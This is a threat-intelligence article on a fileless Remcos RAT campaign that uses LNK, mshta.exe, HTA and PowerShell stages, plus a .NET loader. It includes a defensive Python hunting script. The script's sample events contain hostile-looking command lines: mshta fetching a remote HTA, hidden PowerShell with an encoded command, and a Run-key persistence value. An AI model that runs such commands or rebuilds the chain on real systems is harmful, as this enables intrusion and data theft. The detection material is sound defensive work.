Cybersecurity researchers have identified a sophisticated malware campaign utilizing PowerShell-based shellcode loaders to deploy the Remcos Remote Access Trojan (RAT). This campaign employs deceptive tactics, including the use of malicious LNK files embedded within ZIP archives disguised as legitimate Office documents.
The attack sequence begins with the distribution of ZIP archives containing Windows shortcut (LNK) files. These LNK files, when executed, leverage `mshta.exe`—a legitimate Microsoft utility designed to run HTML Applications (HTA)—to initiate the infection process. Specifically, the LNK files execute an obfuscated HTA file named `xlab22.hta` hosted on a remote server. This HTA file contains Visual Basic Script code that downloads a PowerShell script, a decoy PDF document, and another HTA file named `311.hta`. To ensure persistence, the HTA file modifies the Windows Registry, configuring `311.hta` to launch automatically upon system startup.
Upon execution, the PowerShell script decodes and reconstructs a shellcode loader, which subsequently loads the Remcos RAT payload directly into the system’s memory. This fileless execution method allows the malware to operate without leaving traces on the disk, thereby evading traditional security measures.
Remcos RAT is a versatile tool that grants attackers full control over compromised systems. Its capabilities include gathering system metadata, logging keystrokes, capturing screenshots, monitoring clipboard data, and retrieving lists of installed programs and running processes. Additionally, it establishes a secure TLS connection to a command-and-control (C2) server at readysteaurants[.]com, facilitating continuous data exfiltration and remote control.
This method of deploying Remcos RAT is not unprecedented. In November 2024, Fortinet’s FortiGuard Labs detailed a similar phishing campaign that delivered the malware filelessly using order-themed lures. The appeal of such attack vectors lies in their ability to bypass traditional security solutions by executing malicious code directly in memory, leaving minimal forensic evidence.
The emergence of PowerShell-based attacks underscores the evolving tactics of threat actors aiming to circumvent conventional security defenses. By utilizing LNK files and `mshta.exe` to execute obfuscated PowerShell scripts, these campaigns can effectively evade detection. To mitigate such threats, it is crucial to implement advanced email security measures capable of detecting and blocking malicious LNK attachments before they reach end-users. Additionally, real-time monitoring of PowerShell commands for suspicious activities is essential in identifying and preventing potential breaches.
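The infection chain described above (LNK launching `mshta.exe` against a remote HTA, the HTA spawning PowerShell, and a Run-key entry for `311.hta`) leaves three observable events on the endpoint, and the monitoring recommended in this paragraph amounts to correlating them. The following is an added example written for this article, not code from the researchers or any vendor: three hunting rules run over constructed, Sysmon-style process-creation and registry-set records. The field names, the `example.invalid` hosting URL, the SID and user paths are all assumptions made for the sample data; only the `mshta.exe`, `xlab22.hta` and `311.hta` names come from the article.

```python
"""Hunting rules for the LNK -> mshta.exe -> HTA -> PowerShell -> Run-key chain.

Added example for this article; it is not the researchers' or any vendor's
tooling. Event dicts mimic normalised Sysmon process-creation (EID 1) and
registry value-set (EID 13) records. The field names and every sample value
(URL, SID, user paths) are constructed for illustration.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
URL_RE = re.compile(r"https?://", re.I)
HTA_RE = re.compile(r"\.hta\b", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    detail: str


def _basename(path: str) -> str:
    """Case-folded file name of a Windows path ('C:\\Windows\\mshta.exe' -> 'mshta.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return one Finding per rule hit, in event order; benign events yield nothing."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            image = _basename(ev["image"])
            parent = _basename(ev.get("parent_image", ""))
            cmd = ev.get("command_line", "")
            # Rule 1: mshta.exe pointed at a URL or an .hta file (the LNK's first hop).
            if image == "mshta.exe" and (URL_RE.search(cmd) or HTA_RE.search(cmd)):
                findings.append(Finding("mshta_remote_hta", ev["id"], cmd))
            # Rule 2: PowerShell spawned by a script host; note whether -EncodedCommand is used.
            if image in POWERSHELL and parent in SCRIPT_HOSTS:
                tag = "encoded" if ENCODED_RE.search(cmd) else "plain"
                findings.append(Finding("powershell_from_script_host", ev["id"],
                                        f"parent={parent} ({tag})"))
        elif ev["type"] == "registry_set":
            data = ev.get("details", "")
            # Rule 3: Run/RunOnce value whose data references an HTA or mshta.exe.
            if RUN_KEY_RE.search(ev["target_object"]) and (
                    HTA_RE.search(data) or "mshta" in data.lower()):
                findings.append(Finding("run_key_hta_persistence", ev["id"], data))
    return findings


# Constructed sample telemetry: three benign records, then the three-step chain.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": '"WINWORD.EXE" /n'},
    {"id": 2, "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell.exe -NoProfile"},
    {"id": 3, "type": "registry_set",
     "target_object": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"id": 4, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta.exe http://example.invalid/xlab22.hta"},  # placeholder host
    {"id": 5, "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -enc BASE64PLACEHOLDER"},
    {"id": 6, "type": "registry_set",
     "target_object": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\311",
     "details": r"mshta.exe C:\Users\Public\311.hta"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_id}: {f.detail}")
```

Each rule is useful on its own, but the value is in the sequence: an `mshta.exe` hit followed within minutes by a PowerShell child and a Run-key write on the same host is a much stronger signal than any single event, and the `event_id` field is what a SIEM correlation would join on. Rule 2 deliberately does not require `-EncodedCommand`, since the article describes the script as obfuscated rather than necessarily encoded; the tag simply records which form was seen.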
This disclosure coincides with findings from Palo Alto Networks’ Unit 42 and Threatray, which have detailed a new .NET loader used to deploy various information stealers and RATs, including Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm. This loader operates through a three-stage process:
1. A .NET executable embedding the second and third stages in encrypted form.
2. A .NET DLL that decrypts and loads the subsequent stage.
3. A .NET DLL responsible for deploying the primary malware payload.
Notably, while earlier versions of this loader embedded the second stage as a hardcoded string, more recent iterations utilize a bitmap resource. The first stage extracts and decrypts this data, executing it in memory to maintain a fileless infection chain.
The continuous evolution of such sophisticated attack methodologies highlights the necessity for organizations to adopt comprehensive cybersecurity strategies. This includes regular software updates, employee training on recognizing phishing attempts, and the deployment of advanced threat detection systems capable of identifying and mitigating fileless malware attacks.